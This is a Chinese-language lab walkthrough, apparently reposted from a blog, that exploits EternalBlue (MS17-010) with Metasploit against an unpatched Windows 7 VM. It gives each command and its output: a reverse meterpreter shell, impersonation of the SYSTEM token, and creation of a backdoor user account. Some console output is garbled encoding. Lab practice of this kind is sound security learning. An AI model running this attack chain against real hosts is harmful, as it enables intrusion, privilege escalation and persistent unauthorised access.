标签：88.135 笔记 渗透 win7 445 010 Windows exploit 192.168

实验环境：

靶机：Win7（关闭防火墙，未装永恒之蓝漏洞补丁）192.168.88.135

渗透设备：kali 192.168.88.133（渗透）windows 192.168.88.134（远程登陆验证）

渗透步骤：

1. 进入渗透环境，命令msfconsole
2. 查询永恒之蓝对应的漏洞（ms17-010)，命令search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

3. 使用第2个漏洞，命令use 2

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

4. 查看基础设置，命令options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax '[file:](file://%3cpath%3e)'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

5. 设置攻击目标，命令set rhosts 192.168.88.135

rhosts => 192.168.88.135

6. 检查基础设置，命令options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.88.135 yes The target host(s), range CIDR identifier, or hosts file with syntax '[file:](file://%3cpath%3e)'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
1

7. 进行渗透尝试，命令run

[*] Started reverse TCP handler on 192.168.88.133:4444
[*] 192.168.88.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.88.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.88.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.88.135:445 - Connecting to target for exploitation.
[+] 192.168.88.135:445 - Connection established for exploitation.
[+] 192.168.88.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.88.135:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.88.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.88.135:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.88.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.88.135:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.88.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.88.135:445 - Starting non-paged pool grooming
[+] 192.168.88.135:445 - Sending SMBv2 buffers
[+] 192.168.88.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.88.135:445 - Sending final SMBv2 buffers.
[*] 192.168.88.135:445 - Sending last fragment of exploit packet!
[*] 192.168.88.135:445 - Receiving response from exploit packet
[+] 192.168.88.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.88.135:445 - Sending egg to corrupted connection.
[*] 192.168.88.135:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.88.135
[*] Meterpreter session 1 opened (192.168.88.133:4444 -> 192.168.88.135:49159) at 2022-06-07 23:22:11 -0400
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

8. 返回结果出现“win”，表明渗透成功
9. 进入提权模式 ，命令use incognito

Loading extension incognito...Success.

10. 查看可用权限，命令list\_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
yyx-PC\yyx

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

11. 切换到SYSTEM权限，命令impersonate_token "NT AUTHORITY\SYSTEM"

[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

12. 进入Windows命令提示符环境，命令shell

Process 2924 created.
Channel 2 created.
Microsoft Windows [°汾 6.1.7600]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

13. 创建Windows用户，命令net user oldboy goodITedu@159 /add（用户名和密码自己设置）

net user oldboy goodITedu@159 /add
ļ®³ɹ¦Ϊ³ɡ£

14. 查看用户列表是否存在oldboy，命令net user

net user

\\ µœû§֊»§

-------------------------------------------------------------------------------
Administrator Guest oldboy
test yyx
ļ®ՋѐΪ±ϣ¬µ«·¢ʺһ¸

标签：88.135,笔记,渗透,win7,445,010,Windows,exploit,192.168
来源： https://www.cnblogs.com/singeryoung/p/infiltrate-win7-notes.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。